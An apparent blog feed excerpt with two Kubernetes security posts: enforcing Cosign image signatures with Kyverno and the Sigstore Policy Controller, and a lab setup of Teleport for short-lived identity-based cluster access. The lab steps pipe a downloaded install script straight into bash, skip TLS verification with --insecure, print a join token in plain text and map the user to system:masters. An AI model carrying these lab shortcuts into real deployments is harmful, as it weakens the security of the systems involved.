<span class="hljs-attr">kind:</span> <span class="hljs-string">ImageValidatingPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">ghcr-check-images</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">matchConstraints:</span>
    <span class="hljs-attr">resourceRules:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">apiGroups:</span> [<span class="hljs-string">""</span>]
      <span class="hljs-attr">apiVersions:</span> [<span class="hljs-string">"v1"</span>]
      <span class="hljs-attr">operations:</span> [<span class="hljs-string">"CREATE"</span>]
      <span class="hljs-attr">resources:</span> [<span class="hljs-string">"pods"</span>]

  <span class="hljs-attr">evaluation:</span>
    <span class="hljs-attr">background:</span>
      <span class="hljs-attr">enabled:</span> <span class="hljs-literal">false</span>

  <span class="hljs-attr">validationActions:</span> [<span class="hljs-string">Deny</span>]
  <span class="hljs-attr">failurePolicy:</span> <span class="hljs-string">Ignore</span> 

  <span class="hljs-attr">attestors:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">cosign</span>
    <span class="hljs-attr">cosign:</span>
      <span class="hljs-attr">key:</span>
        <span class="hljs-attr">data:</span> <span class="hljs-string">|
          -----BEGIN PUBLIC KEY-----
          MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEMitBUveNmKw57+UdJ3+mbGKlWp5B
          oWm+HWOBKap2V0Oa2whm/IHHoqReZUPdgj+fsAGyyBvSlbbfQV44zJhx5w==
          -----END PUBLIC KEY-----
</span>
  <span class="hljs-attr">validations:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">expression:</span> <span class="hljs-string">&gt;
      images.containers.all(i,
        (image(i).registry() == "ghcr.io" &amp;&amp;
        image(i).repository().startsWith("sf-matt/"))
          ? verifyImageSignatures(i, [attestors.cosign]) &gt; 0
          : true
      )
</span>    <span class="hljs-attr">message:</span> <span class="hljs-string">all</span> <span class="hljs-string">images</span> <span class="hljs-string">from</span> <span class="hljs-string">ghcr.io/sf-matt</span> <span class="hljs-string">must</span> <span class="hljs-string">have</span> <span class="hljs-string">a</span> <span class="hljs-string">valid</span> <span class="hljs-string">Cosign</span> <span class="hljs-string">signature</span>
</code></pre>
<p>This Kyverno <strong>ImageValidatingPolicy</strong> does the following:</p>
<ul>
<li><p><strong>Scope:</strong> Applies to all Pod <code>CREATE</code> operations.</p>
</li>
<li><p><strong>Target:</strong> Only evaluates images pulled from <code>ghcr.io/sf-matt</code>.</p>
</li>
<li><p><strong>Attestor:</strong> Uses an embedded <strong>Cosign public key</strong> for signature verification.</p>
</li>
<li><p><strong>Logic:</strong> Runs <code>verifyImageSignatures()</code> on each container image.</p>
</li>
<li><p><strong>Enforcement:</strong> Denies workloads if any image from your GHCR namespace isn’t signed by that trusted key.</p>
</li>
<li><p><strong>Behavior:</strong> Ignores other registries and disables background scans (evaluation happens only at creation).</p>
</li>
</ul>
<p>In short: if it comes from your namespace and isn’t cryptographically signed, it never runs.</p>
<p>A problem will arise if your GitHub Container Registry (GHCR) is private, which we have done in this example. Kyverno needs credentials to pull and verify signatures. You can provide these using a standard Kubernetes <code>Secret</code> of type <code>dockerconfigjson</code>.</p>
<p>Generate a GitHub Personal Access Token (classic or fine-grained) with <strong>read:packages</strong> permission,<br />then create the secret in the same namespace where Kyverno runs (usually <code>kyverno</code>). Running it imperatively is easy enough.</p>
<pre><code class="lang-bash">kubectl create secret docker-registry ghcr-creds   --docker-server=ghcr.io   --docker-username=&lt;your-github-username&gt;   --docker-password=&lt;your-personal-access-token&gt;   --docker-email=&lt;your-email&gt;   -n kyverno
</code></pre>
<p>Confirm creation:</p>
<pre><code class="lang-bash">kubectl get secret ghcr-creds -n kyverno
</code></pre>
<p>Then reference the secret inside your <strong>ImageValidatingPolicy</strong> using the <code>credentials</code> field. This tells Kyverno to use your GHCR credentials when verifying Cosign signatures for private images.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">policies.kyverno.io/v1alpha1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ImageValidatingPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">ghcr-check-images</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">matchConstraints:</span>
    <span class="hljs-attr">resourceRules:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">apiGroups:</span> [<span class="hljs-string">""</span>]
      <span class="hljs-attr">apiVersions:</span> [<span class="hljs-string">"v1"</span>]
      <span class="hljs-attr">operations:</span> [<span class="hljs-string">"CREATE"</span>]
      <span class="hljs-attr">resources:</span> [<span class="hljs-string">"pods"</span>]

  <span class="hljs-attr">evaluation:</span>
    <span class="hljs-attr">background:</span>
      <span class="hljs-attr">enabled:</span> <span class="hljs-literal">false</span>

  <span class="hljs-attr">validationActions:</span> [<span class="hljs-string">Deny</span>]
  <span class="hljs-attr">failurePolicy:</span> <span class="hljs-string">Ignore</span> 

  <span class="hljs-attr">credentials:</span>
    <span class="hljs-attr">providers:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"github"</span>
    <span class="hljs-bullet">-</span> <span class="hljs-string">"default"</span> 
    <span class="hljs-attr">secrets:</span> 
    <span class="hljs-bullet">-</span> <span class="hljs-string">"ghcr-creds"</span>

  <span class="hljs-attr">attestors:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">cosign</span>
    <span class="hljs-attr">cosign:</span>
      <span class="hljs-attr">key:</span>
        <span class="hljs-attr">data:</span> <span class="hljs-string">|
          -----BEGIN PUBLIC KEY-----
          MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEoYIRqyJPEOGk84mh9W3XWA42dOPm
          UE03IhLs2sLnRPegfWAO+6mSy8pbEO8R5orKIXqHWq2fz8s6UG9iTXbaRQ==
          -----END PUBLIC KEY-----
</span>      <span class="hljs-attr">ctlog:</span>
        <span class="hljs-attr">insecureIgnoreTlog:</span> <span class="hljs-literal">true</span>
        <span class="hljs-attr">url:</span> <span class="hljs-string">"https://rekor.sigstore.dev"</span>


  <span class="hljs-attr">validations:</span>
  <span class="hljs-bullet">-</span> <span class="hljs-attr">expression:</span> <span class="hljs-string">&gt;
      images.containers.all(i,
        (image(i).registry() == "ghcr.io" &amp;&amp;
        image(i).repository().startsWith("sf-matt/"))
          ? verifyImageSignatures(i, [attestors.cosign]) &gt; 0
          : true
      )
</span>    <span class="hljs-attr">message:</span> <span class="hljs-string">all</span> <span class="hljs-string">images</span> <span class="hljs-string">from</span> <span class="hljs-string">ghcr.io/sf-matt</span> <span class="hljs-string">must</span> <span class="hljs-string">have</span> <span class="hljs-string">a</span> <span class="hljs-string">valid</span> <span class="hljs-string">Cosign</span> <span class="hljs-string">signature</span>
</code></pre>
<p>But here's the problem I've run into. It somehow looks for secrets as a cluster-wide object. If you turn up the logs you can see the following.</p>
<pre><code class="lang-bash">2025-11-03T22:22:02Z -5 k8s.io/client-go@v0.33.3/transport/round_trippers.go:632 &gt; Response logger=klog milliseconds=1 status=<span class="hljs-string">"404 Not Found"</span> url=https://10.96.0.1:443/api/v1/secrets/ghcr-creds v=6 verb=GET
</code></pre>
<p>So while it will work if you switch the image to public, that sorta defeats the point of what we're trying here. So let's switch to a good old <code>ClusterPolicy</code> with <code>verifyImages</code>.</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">kyverno.io/v1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ClusterPolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">check-ghcr-image</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">webhookConfiguration:</span>
    <span class="hljs-attr">failurePolicy:</span> <span class="hljs-string">Fail</span>
    <span class="hljs-attr">timeoutSeconds:</span> <span class="hljs-number">30</span>
  <span class="hljs-attr">background:</span> <span class="hljs-literal">false</span>
  <span class="hljs-attr">rules:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">check-ghcr-image</span>
      <span class="hljs-attr">match:</span>
        <span class="hljs-attr">any:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">resources:</span>
            <span class="hljs-attr">kinds:</span>
              <span class="hljs-bullet">-</span> <span class="hljs-string">Pod</span>
      <span class="hljs-attr">verifyImages:</span>
      <span class="hljs-bullet">-</span> <span class="hljs-attr">imageReferences:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-string">"ghcr.io/sf-matt/hello-flask*"</span>
        <span class="hljs-attr">failureAction:</span> <span class="hljs-string">Enforce</span>
        <span class="hljs-attr">attestors:</span>
        <span class="hljs-bullet">-</span> <span class="hljs-attr">entries:</span>
          <span class="hljs-bullet">-</span> <span class="hljs-attr">keys:</span>
              <span class="hljs-attr">publicKeys:</span> <span class="hljs-string">|-
                  -----BEGIN PUBLIC KEY-----
                  MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEoYIRqyJPEOGk84mh9W3XWA42dOPm
                  UE03IhLs2sLnRPegfWAO+6mSy8pbEO8R5orKIXqHWq2fz8s6UG9iTXbaRQ==
                  -----END PUBLIC KEY-----
</span>              <span class="hljs-attr">rekor:</span>
                <span class="hljs-attr">ignoreTlog:</span> <span class="hljs-literal">true</span>
                <span class="hljs-attr">url:</span> <span class="hljs-string">https://rekor.sigstore.dev</span>
                <span class="hljs-attr">pubkey:</span> <span class="hljs-string">|-
                  -----BEGIN PUBLIC KEY-----
                  MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEoYIRqyJPEOGk84mh9W3XWA42dOPm
                  UE03IhLs2sLnRPegfWAO+6mSy8pbEO8R5orKIXqHWq2fz8s6UG9iTXbaRQ==
                  -----END PUBLIC KEY-----
</span>              <span class="hljs-attr">ctlog:</span>
                <span class="hljs-attr">ignoreSCT:</span> <span class="hljs-literal">true</span>
                <span class="hljs-attr">pubkey:</span> <span class="hljs-string">|-
                  -----BEGIN PUBLIC KEY-----
                  MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEoYIRqyJPEOGk84mh9W3XWA42dOPm
                  UE03IhLs2sLnRPegfWAO+6mSy8pbEO8R5orKIXqHWq2fz8s6UG9iTXbaRQ==
                  -----END PUBLIC KEY-----</span>
</code></pre>
<p>And now you should be able to deploy it just fine. And if you have Policy Reporter running you can see it pass. </p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1762214498308/4a6c7192-5523-444a-892a-be452e1ac534.png" alt class="image--center mx-auto" /></p>
<p>You actually wouldn’t have been able to see that for <code>ImageValidatingPolicy</code>. Another plus for <code>ClusterPolicy</code>.</p>
<hr />
<h2 id="heading-sigstore-policy-controller">Sigstore Policy Controller</h2>
<p>Going through the process of validating with Kyverno feels quite clunky. So let's try another way.</p>
<p>In the Sigstore docs I found their <a target="_blank" href="https://github.com/sigstore/policy-controller/tree/main">Policy Controller</a>, which is just an admission controller. So let's try using <strong>Sigstore policy-controller</strong> to accomplish the same as what we did with Kyverno.</p>
<p>We'll start by using the cosign generated keypair from before or you can create a new one. You could reuse the previous app or create a new one.</p>
<h3 id="heading-install-policy-controller">Install Policy-Controller</h3>
<p>Let's get started with installing policy-controller.</p>
<pre><code class="lang-bash">helm repo add sigstore https://sigstore.github.io/helm-charts
helm repo update
helm upgrade --install policy-controller sigstore/policy-controller   -n cosign-system --create-namespace
</code></pre>
<p>Then you need to label the namespace to test. </p>
<blockquote>
<p>Beware that when you do this if you have no policy for an image you will be blocked from deploying that image.</p>
</blockquote>
<pre><code class="lang-bash">kubectl label namespace default policy.sigstore.dev/include=<span class="hljs-literal">true</span>
</code></pre>
<p>Now we have our newest Admission Controller installed. Let's create a <strong>ClusterImagePolicy</strong> that requires your keypair signature. Inline the <strong>public key</strong> (PEM).</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">policy.sigstore.dev/v1beta1</span>
<span class="hljs-attr">kind:</span> <span class="hljs-string">ClusterImagePolicy</span>
<span class="hljs-attr">metadata:</span>
  <span class="hljs-attr">name:</span> <span class="hljs-string">require-cosign-keypair</span>
<span class="hljs-attr">spec:</span>
  <span class="hljs-attr">mode:</span> <span class="hljs-string">enforce</span>
  <span class="hljs-attr">images:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">glob:</span> <span class="hljs-string">ghcr.io/sf-matt/hello-flask*</span>
  <span class="hljs-attr">authorities:</span>
    <span class="hljs-bullet">-</span> <span class="hljs-attr">key:</span>
        <span class="hljs-attr">data:</span> <span class="hljs-string">|
          -----BEGIN PUBLIC KEY-----
          MFkwEwYHKoZIzj0CAQYIKoZIzj0DAQcDQgAEoYIRqyJPEOGk84mh9W3XWA42dOPm
          UE03IhLs2sLnRPegfWAO+6mSy8pbEO8R5orKIXqHWq2fz8s6UG9iTXbaRQ==
          -----END PUBLIC KEY-----</span>
</code></pre>
<p>Deploy your new policy.</p>
<pre><code class="lang-bash">kubectl apply -f require-cosign-keypair.yaml
</code></pre>
<p>Then try deploying the same workload. It should deploy fine. You can see the validations by looking at the logs.</p>
<pre><code class="lang-bash">kubectl -n cosign-system logs deploy/policy-controller-webhook
</code></pre>
<p>You should see something like the following:</p>
<pre><code class="lang-bash">{...Validated 1 policies <span class="hljs-keyword">for</span> image ghcr.io/sf-matt/hello-flask-signed@sha256:blahblah...}
</code></pre>
<p>And that is that. It works quite easily. No issues with image pull secrets and no complex CEL expressions (although we dropped that with a ClusterPolicy). Although it is not ideal to have another Admission Controller, their very nature allows them to stack. So something definitely worth considering. And the overhead of the one pod is not too high.</p>
<pre><code class="lang-yaml">    <span class="hljs-attr">Limits:</span>
      <span class="hljs-attr">cpu:</span>     <span class="hljs-string">200m</span>
      <span class="hljs-attr">memory:</span>  <span class="hljs-string">512Mi</span>
    <span class="hljs-attr">Requests:</span>
      <span class="hljs-attr">cpu:</span>      <span class="hljs-string">100m</span>
      <span class="hljs-attr">memory:</span>   <span class="hljs-string">128Mi</span>
</code></pre>
<hr />
<h2 id="heading-wrap-up">Wrap Up</h2>
<p>Kubernetes will happily run whatever you hand it — no questions asked. It doesn’t check signatures, provenance, or who actually built the thing. It’s the ultimate easy button.</p>
<p>Image signing is the missing trust layer most teams skip, even though it’s absurdly simple to add. Sure, it’s CI-friendly too, but this wasn’t meant to be another “here’s a GitHub Action” post.</p>
<p>With Cosign, you can give every build a verifiable identity. Whether that's through your own keypair or keyless signing tied to GitHub’s OIDC workflow.
With Kyverno, you can draw clear boundaries around what’s allowed to run in the cluster.
And with Sigstore Policy Controller, you can tighten that loop with much simpler and more direct policies.</p>
<p>Together, they turn the Kubernetes API into an actual supply-chain checkpoint. If something shows up unsigned, tampered with, or built outside your pipelines, it simply doesn’t start.</p>
<p>The best part? It’s dead simple. All open source, all auditable, and built on the same foundations powering modern supply-chain security.</p>
<p>So go for the low-hanging fruit — start by making sure your cluster only runs what’s been signed and proven to be yours.</p>
]]></content:encoded></item><item><title><![CDATA[Access Control, Actually: Teleport To the Rescue]]></title><description><![CDATA[Last time, we walked the whole chain of Kubernetes access — from SSH on the node to the default service account that every Pod inherits. That exercise made one thing clear: Kubernetes doesn’t have a single front door. It has a series of loosely conne...]]></description><link>https://cloudsecburrito.com/access-control-actually-teleport-to-the-rescue</link><guid isPermaLink="true">https://cloudsecburrito.com/access-control-actually-teleport-to-the-rescue</guid><category><![CDATA[Kubernetes]]></category><category><![CDATA[Security]]></category><category><![CDATA[rbac]]></category><category><![CDATA[Kubernetes Security]]></category><category><![CDATA[Teleport]]></category><dc:creator><![CDATA[Matt Brown]]></dc:creator><pubDate>Mon, 20 Oct 2025 21:27:33 GMT</pubDate><enclosure url="https://cdn.hashnode.com/res/hashnode/image/upload/v1760995151986/2442e028-eacf-4125-95b0-706d8c7526d5.png" length="0" type="image/jpeg"/><content:encoded><![CDATA[<p>Last time, we walked the whole chain of Kubernetes access — from SSH on the node to the default service account that every Pod inherits. That exercise made one thing clear: Kubernetes doesn’t have a single front door. It has a series of loosely connected locks, and most of them assume you’ll do the right thing.</p>
<p>RBAC gives us policy, not identity. It answers what someone can do, not who they are. And that’s where setups can easily stop. Developers authenticate to Okta or GitHub, grab a kubeconfig from somewhere, and the cluster happily trusts whatever cert that file presents. In other words, Kubernetes leaves the identity problem unsolved. </p>
<p>There has to be a better way, right?</p>
<p>What if every access request were tied to a real human identity — backed by short-lived credentials and logged end to end — without touching the Kubernetes API? </p>
<p>That’s what <a target="_blank" href="https://github.com/gravitational/teleport">Teleport</a> does. It takes the same basic primitives (certificates, RBAC, and Kubernetes’ native API) and layers an auditable, identity-aware access proxy on top.</p>
<p>In this post, we’ll set up a local Teleport instance, connect it to a cluster, and replace our kubeconfig with short-lived, verifiable identity. Sounds pretty good.</p>
<blockquote>
<p>Note on Licensing Teleport’s open-source edition is released under AGPL-3.0, which (according to my research) means that if you modify and run it as a network service for others, you’re expected to share your source code. For most personal labs and internal deployments, this isn’t an issue. I’ll cover open-source licensing in more detail in a separate post. It’s a surprisingly interesting topic.</p>
</blockquote>
<hr />
<h2 id="heading-the-lab-setup-welcome-to-hell">The Lab Setup (Welcome to Hell)</h2>
<p>Ugh, this was not a fun exercise. Of course at the end it was so easy to understand. If you want to do this in a local environment the instructions should work a charm. The <a target="_blank" href="https://goteleport.com/docs/linux-demo/">instructions</a> from the Teleport docs mostly work, but of course not perfectly.</p>
<p>I started simple: one Teleport proxy in Docker and a self-signed certificate with <code>mkcert</code>. Nothing fancy, no external dependencies. This was all done on my kubeadm <code>controlplane</code> node.</p>
<h3 id="heading-install-mkcert">Install <code>mkcert</code></h3>
<pre><code class="lang-bash">sudo apt install mkcert
mkcert -install
</code></pre>
<p>Next create a cert folder where we store certs and share with our Docker container. Also add the <code>mkcert</code> CA to that folder. The trickiest part was getting the cert right. setting it to the IP address of the Controlplane node was the key.</p>
<pre><code class="lang-bash">mkdir teleport-tls
<span class="hljs-built_in">cd</span> teleport-tls
mkcert 192.168.64.4 <span class="hljs-comment">#Or your node IP</span>
cp <span class="hljs-string">"<span class="hljs-subst">$(mkcert -CAROOT)</span>/rootCA.pem"</span> .
</code></pre>
<h3 id="heading-spin-up-docker">Spin Up Docker</h3>
<p>Now we have to spin up our Teleport Docker instance. Of course make sure Docker is installed on your node.</p>
<pre><code class="lang-bash">docker run -it -v .:/etc/teleport-tls -p 3080:443 ubuntu:22.04
</code></pre>
<h3 id="heading-install-teleport-inside-the-container">Install Teleport inside the container</h3>
<pre><code class="lang-bash">apt-get update &amp;&amp; apt-get install -y curl
cp /etc/teleport-tls/rootCA.pem /etc/ssl/certs/mkcertCA.pem
curl https://cdn.teleport.dev/install.sh | bash -s 18.2.4
</code></pre>
<p>Then generate a config file with the generated certs:</p>
<pre><code class="lang-bash">teleport configure -o file \
  --cluster-name=teleport \
  --public-addr=192.168.64.4:3080 \
  --cert-file=/etc/teleport-tls/192.168.64.4.pem \
  --key-file=/etc/teleport-tls/192.168.64.4-key.pem
</code></pre>
<p>Finally, start it up:</p>
<pre><code class="lang-bash">teleport start --config=/etc/teleport.yaml
</code></pre>
<p>That’s your full access proxy running locally. The Teleport web UI comes up at <code>https://192.168.64.4:3080</code> (or whatever IP address you have).</p>
<h3 id="heading-create-your-first-user">Create your first user</h3>
<p>Fire up another terminal and connect to your Docker container, which you can find by the usual Docker command:</p>
<pre><code class="lang-bash">matt@controlplane:~$ docker ps
CONTAINER ID   IMAGE          COMMAND       CREATED      STATUS          PORTS                                       NAMES
7867833a79e8   ubuntu:22.04   <span class="hljs-string">"/bin/bash"</span>   3 days ago   Up 27 minutes   0.0.0.0:3080-&gt;443/tcp, [::]:3080-&gt;443/tcp   heuristic_sammet
matt@controlplane:~$ docker <span class="hljs-built_in">exec</span> -it 7867833a79e8 bash
root@7867833a79e8:/<span class="hljs-comment">#</span>
</code></pre>
<p>Then create a user for the Teleport UI (I kept the logins from the docs, but you don't need them).</p>
<pre><code class="lang-bash">tctl users add teleport-admin --roles=editor,access --logins=root,ubuntu,ec2-user
</code></pre>
<p>You’ll get a signup link. Open it in your browser to complete the setup and enable OTP. Annoying, but it gets worse later.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760822823782/ad93e11b-c1ac-4d38-94be-cca96a3d9ae5.png" alt class="image--center mx-auto" /></p>
<p>We're making good progress.</p>
<hr />
<h2 id="heading-integrating-kubernetes-with-teleport">Integrating Kubernetes with Teleport</h2>
<p>You'll notice a lot of resource options in the UI, but we'll stick with Kubernetes. On the Kubernetes side, it just requires you to follow the resource enrollment process. </p>
<h3 id="heading-enroll-kubernetes-resource">Enroll Kubernetes Resource</h3>
<p>Install the helm chart.</p>
<pre><code class="lang-bash">helm repo add teleport https://charts.releases.teleport.dev &amp;&amp; helm repo update
</code></pre>
<p>Configure the cluster values and you'll get a command like follows, that you run in your terminal.</p>
<pre><code class="lang-bash">cat &lt;&lt; EOF &gt; prod-cluster-values.yaml
roles: kube,app,discovery
authToken: 3bdc40c408f1cd8809daeadfd83202e4
proxyAddr: 192.168.64.4:3080
kubeClusterName: kubernetes
labels:
    teleport.internal/resource-id: d5319a0c-5db5-4916-9984-8a598f2ae740

EOF

helm install teleport-agent teleport/teleport-kube-agent -f prod-cluster-values.yaml --version 18.2.4 \
--create-namespace --namespace teleport
</code></pre>
<p>You might change it to <code>helm upgrade --install</code> instead. You never know if you'll have to run it again. </p>
<p>Once the agent registers successfully, it appears in the Teleport UI under <strong>Kubernetes Clusters</strong>.<br />We'll come back to this.</p>
<h3 id="heading-connect-client">Connect Client</h3>
<p>Now we need to install our client. I went to a completely different Ubuntu machine that had no kubeconfig but was still on the same network.</p>
<h4 id="heading-install-teleport-client">Install Teleport client</h4>
<pre><code class="lang-bash">sudo apt install -y apt-transport-https
curl https://deb.releases.teleport.dev/teleport-pubkey.asc | sudo tee /usr/share/keyrings/teleport-archive-keyring.asc
<span class="hljs-built_in">echo</span> <span class="hljs-string">"deb [signed-by=/usr/share/keyrings/teleport-archive-keyring.asc] https://deb.releases.teleport.dev/ stable main"</span> | sudo tee /etc/apt/sources.list.d/teleport.list
sudo apt update &amp;&amp; sudo apt install teleport
</code></pre>
<p>Verify:</p>
<pre><code class="lang-bash">matt@linux-server-1:~$ tsh version
Teleport v18.2.4 git:v18.2.4-0-gb7ab869 go1.24.7
</code></pre>
<p>Cool we're all set. Except you probably don't have <code>kubectl</code>! So one more <a target="_blank" href="https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-using-native-package-management">step</a>.</p>
<pre><code class="lang-bash">sudo apt-get update
sudo apt-get install -y apt-transport-https ca-certificates curl gnupg
curl -fsSL https://pkgs.k8s.io/core:/stable:/v1.34/deb/Release.key | sudo gpg --dearmor -o /etc/apt/keyrings/kubernetes-apt-keyring.gpg
sudo chmod 644 /etc/apt/keyrings/kubernetes-apt-keyring.gpg
<span class="hljs-built_in">echo</span> <span class="hljs-string">'deb [signed-by=/etc/apt/keyrings/kubernetes-apt-keyring.gpg] https://pkgs.k8s.io/core:/stable:/v1.34/deb/ /'</span> | sudo tee /etc/apt/sources.list.d/kubernetes.list
sudo chmod 644 /etc/apt/sources.list.d/kubernetes.list 
sudo apt-get update
sudo apt-get install -y kubectl
</code></pre>
<h3 id="heading-login-via-teleport">Login via Teleport</h3>
<p>Now for the finale. In the Teleport UI, select your Kubernetes resource and copy the <code>tsh</code> command shown under “Connect”.</p>
<p><img src="https://cdn.hashnode.com/res/hashnode/image/upload/v1760824723953/28506821-8b90-4641-908c-e0e53ac50bed.png" alt class="image--center mx-auto" /></p>
<p>Run it to connect:</p>
<pre><code class="lang-bash">matt@linux-server-1:~$ tsh login --proxy=192.168.64.4:3080 --auth=<span class="hljs-built_in">local</span> --user=teleport-admin teleport
ERROR: WARNING:

  The proxy you are connecting to has presented a certificate signed by a
  unknown authority. This is most likely due to either being presented
  with a self-signed certificate or the certificate was truly signed by an
  authority not known to the client.

  If you know the certificate is self-signed and would like to ignore this
  error use the --insecure flag.

  If you have your own certificate authority that you would like to use to
  validate the certificate chain presented by the proxy, <span class="hljs-built_in">set</span> the
  SSL_CERT_FILE and SSL_CERT_DIR environment variables respectively and try
  again.

  If you think something malicious may be occurring, contact your Teleport
  system administrator to resolve this issue.
</code></pre>
<p>Oops bad cert, so let's bypass that and login in with your password and OTP. Note: --insecure only skips TLS validation to your local proxy, your Kubernetes traffic is still fully encrypted.</p>
<pre><code class="lang-bash">matt@linux-server-1:~$ tsh login --proxy=192.168.64.4:3080 --auth=<span class="hljs-built_in">local</span> --user=teleport-admin teleport --insecure
Enter password <span class="hljs-keyword">for</span> Teleport user teleport-admin:
WARNING: You are using insecure connection to Teleport proxy https://192.168.64.4:3080
Enter an OTP code from a device:
&gt; Profile URL:        https://192.168.64.4:3080
  Logged <span class="hljs-keyword">in</span> as:       teleport-admin
  Cluster:            teleport
  Roles:              access, editor
  Logins:             root, ubuntu, ec2-user
  Kubernetes:         enabled
  Kubernetes cluster: <span class="hljs-string">"kubernetes"</span>
  Kubernetes users:   teleport-admin
  Kubernetes groups:  system:masters
  Valid until:        2025-10-19 02:17:46 -0700 PDT [valid <span class="hljs-keyword">for</span> 12h0m0s]
  Extensions:         login-ip, permit-agent-forwarding, permit-port-forwarding, permit-pty, private-key-policy
</code></pre>
<p>Switch Kubernetes context and you can see the nodes:</p>
<pre><code class="lang-bash">matt@linux-server-1:~$ tsh kube login kubernetes --insecure
matt@linux-server-1:~/teleport$ kubectl get nodes
NAME           STATUS   ROLES           AGE    VERSION
controlplane   Ready    control-plane   366d   v1.31.8
kubeworker1    Ready    &lt;none&gt;          258d   v1.31.8
</code></pre>
<p>And there it is — the aha moment. No static ~/.kube/config, just short-lived, identity-based access that expires when it should. I promise this would be way easier with an EKS cluster.</p>
<hr />
<h2 id="heading-dissecting-the-teleport-generated-kubernetes-context">Dissecting the Teleport-Generated Kubernetes Context</h2>
<p>After logging in with:</p>
<pre><code class="lang-bash">tsh login --proxy=192.168.64.4:3080 --auth=<span class="hljs-built_in">local</span> --user=teleport-admin --insecure
</code></pre>
<p>You’ve now got a short-lived identity with these traits:</p>
<ul>
<li><p><strong>Teleport Cluster:</strong> <code>teleport</code></p>
</li>
<li><p><strong>User:</strong> <code>teleport-admin</code></p>
</li>
<li><p><strong>Roles:</strong> <code>access, editor</code></p>
</li>
<li><p><strong>Kubernetes:</strong> enabled</p>
</li>
<li><p><strong>Kubernetes Cluster:</strong> <code>kubernetes</code></p>
</li>
<li><p><strong>Kubernetes Groups:</strong> <code>system:masters</code></p>
</li>
<li><p><strong>Validity:</strong> 12 hours</p>
</li>
</ul>
<p>As we saw before, running <code>kubectl get nodes</code> confirms access:</p>
<pre><code class="lang-bash">controlplane   Ready    control-plane   366d   v1.31.8
kubeworker1    Ready    &lt;none&gt;          258d   v1.31.8
</code></pre>
<h3 id="heading-what-teleport-did">What Teleport Did</h3>
<p>Teleport issued short-lived client certificates and injected a <strong>Kubernetes context</strong> into your kubeconfig that points <code>kubectl</code> to Teleport’s Kubernetes proxy (<code>:3026</code>). Grab it as follows.</p>
<pre><code class="lang-bash">matt@linux-server-1:~$ cat .kube/config
</code></pre>
<h3 id="heading-the-teleport-generated-kubeconfig-section">The Teleport-generated kubeconfig section</h3>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">clusters:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">teleport-kube</span>
  <span class="hljs-attr">cluster:</span>
    <span class="hljs-attr">server:</span> <span class="hljs-string">https://192.168.64.4:3026</span>
    <span class="hljs-attr">certificate-authority-data:</span> <span class="hljs-string">&lt;base64</span> <span class="hljs-string">PEM&gt;</span>
<span class="hljs-attr">contexts:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">teleport-admin@teleport-kube</span>
  <span class="hljs-attr">context:</span>
    <span class="hljs-attr">cluster:</span> <span class="hljs-string">teleport-kube</span>
    <span class="hljs-attr">user:</span> <span class="hljs-string">teleport-admin@teleport-kube</span>
    <span class="hljs-attr">namespace:</span> <span class="hljs-string">default</span>
<span class="hljs-attr">current-context:</span> <span class="hljs-string">teleport-admin@teleport-kube</span>
<span class="hljs-attr">users:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">name:</span> <span class="hljs-string">teleport-admin@teleport-kube</span>
  <span class="hljs-attr">user:</span>
    <span class="hljs-attr">client-certificate-data:</span> <span class="hljs-string">&lt;base64</span> <span class="hljs-string">PEM&gt;</span>
    <span class="hljs-attr">client-key-data:</span> <span class="hljs-string">&lt;base64</span> <span class="hljs-string">PEM&gt;</span>
</code></pre>
<p>The <strong>server</strong> field shows that <code>kubectl</code> talks to the <strong>Teleport proxy</strong> rather than directly to the Kubernetes API server. Teleport validates your cert, maps your roles → K8s groups, and forwards the request securely.</p>
<h3 id="heading-parsing-your-teleport-injected-kubeconfig">Parsing Your Teleport-Injected kubeconfig</h3>
<p>Here’s the kubeconfig your test box is using <strong>after</strong> <code>tsh login</code> (redacted):</p>
<pre><code class="lang-yaml"><span class="hljs-attr">apiVersion:</span> <span class="hljs-string">v1</span>
<span class="hljs-attr">clusters:</span>
<span class="hljs-bullet">-</span> <span class="hljs-attr">cluster:</span>
    <span class="hljs-attr">certificate-authority-data:</span> <span class="hljs-string">&lt;redacted&gt;</span>
    <span class="hljs-attr">server:</span> <span class="hljs-string">https://192.168.64.4:3080</span>
